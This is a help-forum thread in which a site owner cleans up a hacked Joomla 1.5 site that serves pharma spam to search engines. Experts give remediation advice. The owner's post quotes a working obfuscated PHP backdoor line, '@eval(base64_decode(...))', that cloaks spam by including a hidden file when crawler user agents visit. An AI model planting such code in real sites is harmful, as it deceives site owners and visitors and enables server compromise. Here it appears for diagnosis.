Solved

I have a site that has got viagra and other spam stuff all through their site on google.

Posted on 2014-09-03
7
195 Views
Last Modified: 2014-09-18
Hi,
On my site here http://simmental.com.au you will notice that if you google search it, there are spam words through out the site.
How do I clean this site up and get rid of the garbage?
Thank you
0
Comment
Question by:Amanda Watson
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 3
  • 3
7 Comments
 
LVL 58

Assisted Solution

by:Gary
Gary earned 100 total points
ID: 40302498
Is this a CMS?
Can you give some example pages where the spam is?

Obviously someone has hacked the site and you need to check all your files for funny things like base64 encoded code
Change all your passwords - ftp etc - immediately
0
 
LVL 11

Author Comment

by:Amanda Watson
ID: 40309123
Thanks,  changing passwords etc is obvious now!, but how can I fix whats is there.....do all files have to be tested?
0
 
LVL 58

Expert Comment

by:Gary
ID: 40309125
Yes, unless you have a backup you can upload.
0
2017 Webroot Threat Report

MSPs: Get the facts you need to protect your clients.
The 2017 Webroot Threat Report provides a uniquely insightful global view into the analysis and discoveries made by the Webroot® Threat Intelligence Platform to provide insights on key trends and risks as seen by our users.

 
LVL 11

Author Comment

by:Amanda Watson
ID: 40315987
I found this on the index page
<?php @eval(base64_decode("aWYgKEBwcmVnX21hdGNoICgiL1tHZ11bT29dW09vXVtHZ11bTGxdW0VlXXxbTGxdW0lpXVtWdl1bRWVdfFtNbV1bU3NdW05uXXxbWXldW0FhXVtIaF1bT29dW09vXXxbQWFdW1NzXVtLa118W0FhXVtPb11bTGxdfFtCYl1bT29dW1R0XS8iLCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSkpIHsKCWlmIChAaXNfZmlsZSgiLi9pbWFnZXMvc3Rvcmllcy9saXN0LnR4dCIpKSB7CgkJQGluY2x1ZGUgIi4vaW1hZ2VzL3N0b3JpZXMvbGlzdC50eHQiOwoJfQp9Cg==")); ?>


Could that be the only area or cultprit?
A
0
 
LVL 58

Expert Comment

by:Gary
ID: 40315992
Usually its one or 2 files, if you remove it is it fixed
0
 
LVL 17

Accepted Solution

by:
Lucas Bishop earned 400 total points
ID: 40318680
In viewing the source code of your site, I see you're using Joomla 1.5 as your CMS.  The version you are using reached end of life in Sep 2012. See the announcement here: http://docs.joomla.org/Joomla_1.5_version_history

You can remove any malicious scripts you find in the source code of your site, but odds are, there are a variety of security holes in your CMS. Hence, if you remove the malicious files today, they'll probably be inserted again shortly thereafter.  You can search google for "joomla 1.5 exploit" and find a slew of potential culprits that can effect your current setup.

Finally, I decoded the script you posted above and the following file is being referenced in it, from your server... I'd delete this: http://simmental.com.au/images/stories/list.txt
0
 
LVL 11

Author Closing Comment

by:Amanda Watson
ID: 40331789
Well advised
0

Featured Post

Free Tool: ZipGrep

ZipGrep is a utility that can list and search zip (.war, .ear, .jar, etc) archives for text patterns, without the need to extract the archive's contents.

One of a set of tools we're offering as a way to say thank you for being a part of the community.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Online promotion is consistently becoming more important for all types of businesses. From Facebook ads to search engines to YouTube videos, there are all sorts of channels that can effectively be used to promote a business or product. But how shoul…
FAQ pages provide a simple way for you to supply and for customers to find answers to the most common questions about your company. Here are six reasons why your company website should have a FAQ page
Use Wufoo, an online form creation tool, to make powerful forms. Learn how to selectively show certain fields based on user input using rules to gather relevant information and data from your forms. The rules feature provides you with an opportunity…
Learn how to set-up custom confirmation messages to users who complete your Wufoo form. Include inputs from fields in your form, webpage redirects, and more with Wufoo’s confirmation options.

752 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question